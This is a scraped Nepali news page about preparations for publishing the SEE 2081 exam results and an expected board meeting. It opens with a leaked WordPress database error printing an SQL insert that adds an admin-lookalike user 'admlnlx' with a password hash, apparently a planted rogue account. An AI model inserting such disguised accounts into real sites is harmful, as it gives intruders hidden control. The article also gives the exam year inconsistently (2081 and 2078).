WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BsJJwSdRd62NuoF0zU1E0/EFn6tqdW/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 01:35:36', '', 'admlnlx', 'admlnlx')
काठमाडौँ । माध्यमिक शिक्षा परीक्षा (एसईई) २०८१ को नतिजा सार्वजनिक गर्ने प्रक्रिया अन्तिम चरणमा पुगेको छ । परीक्षा नियन्त्रक डा. गणेश भट्टराईका अनुसार अहिले नतिजा तयारीको अन्तिम काम भैरहेको जानकारी दिए । भटराईले नतिजा सार्वजनिक गर्नका लागि आज परीक्षा बोर्डको बैठक बस्ने बताए ।
“हामी नतिजाको अन्तिम तयारीमा छौं, तर प्रकाशित गर्ने निर्णय भने बोर्ड बैठकबाट नै गर्नुपर्ने हुन्छ,” भट्टराईले भने, “आजै बोर्ड बैठक बस्ने सम्भावना छ ।” यसैबीच, राष्ट्रिय परीक्षा बोर्डका सदस्य सचिव जंगबहादुर अर्यालले पनि आज बैठक बस्ने तयारी भए पनि यसको ठोस समय तय भइनसकेको बताए ।
२०७८ सालको एसईई परीक्षा चैत ७ गतेदेखि सञ्चालन भएको थियो। उक्त परीक्षामा नियमिततर्फ ४ लाख ३१ हजार ४६६ र ग्रेड वृद्धि तर्फ ६७ हजार ७१५ जना विद्यार्थी सहभागी भएका थिए । कुल सहभागी संख्या ४ लाख ९९ हजार १८३ रहेको छ ।